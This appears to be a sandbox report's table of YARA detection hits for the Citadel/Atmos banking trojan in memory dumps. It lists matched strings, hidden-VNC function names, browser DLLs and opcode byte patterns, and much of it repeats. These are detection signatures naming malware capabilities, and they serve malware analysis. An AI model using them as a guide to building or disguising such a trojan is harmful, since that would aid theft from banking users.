0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x11e7f:$MZ: 4D 5A 0x11fc7:$MZ: 4D 5A 0x14fbd:$MZ: 4D 5A 0x1f234:$MZ: 4D 5A 0x1f274:$MZ: 4D 5A 0x3e4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e578:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8d48:$c: %BOTID% 0x8d50:$d: %BOTNET% 0x8e64:$f: bc_remove 0x8e70:$g: bc_add 0x7b68:$ggurl: http://www.google.com/webhp
00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000000.00000003.1699553297.0000000002590000.00000004.00001000.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x1232f:$MZ: 4D 5A 0x12477:$MZ: 4D 5A 0x1546d:$MZ: 4D 5A 0x1f6e4:$MZ: 4D 5A 0x1f724:$MZ: 4D 5A 0x3fcb8:$MZ: 4D 5A 0x3e984:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3ea28:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f8d0:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f8f0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e7d7:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x91f8:$c: %BOTID% 0x9200:$d: %BOTNET% 0x9314:$f: bc_remove 0x9320:$g: bc_add 0x8018:$ggurl: http://www.google.com/webhp
00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
